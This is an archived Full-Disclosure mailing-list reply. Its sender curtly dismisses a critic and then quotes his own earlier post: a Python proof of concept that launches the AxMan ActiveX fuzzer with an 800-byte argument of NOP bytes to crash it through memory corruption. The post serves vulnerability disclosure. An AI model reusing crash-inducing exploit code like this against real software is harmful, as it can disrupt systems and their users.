[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption PoC
- From: kaveh ghaemmaghami <kavehghaemmaghami@xxxxxxxxxxxxxx>
- Date: Sun, 29 Jul 2012 15:08:44 -0700
I think ur on vacation now aren't u .... Plus nobody ask u to read my
post and i am not interested about ur opinion keep it for yourself
On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami
<kavehghaemmaghami@xxxxxxxxxxxxxx> wrote:
> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
> Crash : http://imageshack.us/f/217/axman.jpg/
> Date: July 28, 2012
> Author: coolkaveh
> coolkaveh@xxxxxxxxxxxxxx
> Https://twitter.com/coolkaveh
> Vendor Homepage: http://digitaloffense.net/tools/axman/
> version : 1.0.0
> Tested on: windows 7 SP1
> ========================================================
> Crash The Exploiter
> Lame HD Moore fuzzer Memory Corruption
> By Awsome coolkaveh
>
> -------------------------------------------------------------------------------------------------------
>
> import os
> import win32api
> crash = " Crash The Exploiter "
> lame=" Lame HD Moore fuzzer Memory corruption "
> awsome=" By Awsome coolkaveh "
> print
> print
> print
> print crash
> print
> print lame
> print
> print awsome
> print
> print
> print
> print
> exploit = ("\x90" *800)
> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/